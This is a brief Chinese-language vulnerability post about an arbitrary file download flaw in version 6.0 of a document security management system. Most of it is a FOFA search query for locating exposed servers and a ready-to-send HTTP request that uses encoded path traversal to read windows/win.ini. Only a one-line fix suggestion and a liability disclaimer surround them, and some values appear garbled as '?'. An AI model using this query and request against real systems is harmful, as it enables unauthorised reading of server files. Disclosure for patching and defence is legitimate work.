免責聲明：本號提供的網絡安全信息僅供參考，不構成專業建議。作者不對任何由于使用本文信息而導致的直接或間接損害承擔責任。如涉及侵權，請及時與我聯系，我將盡快處理并刪除相關內容。

漏洞描述

電子文檔安全管理系統 V6.0 resources/backup存在任意文件下載漏洞，攻擊者可通過該漏洞獲取服務器所有文件信息。

搜索語法

FOFA:body="docsafe/docsafe.nocache.js"?

漏洞再現

GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1
Host:?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

?

修復建議

禁用特殊字符，限制文件讀取路徑。關注廠商官網信息，及時更新版本?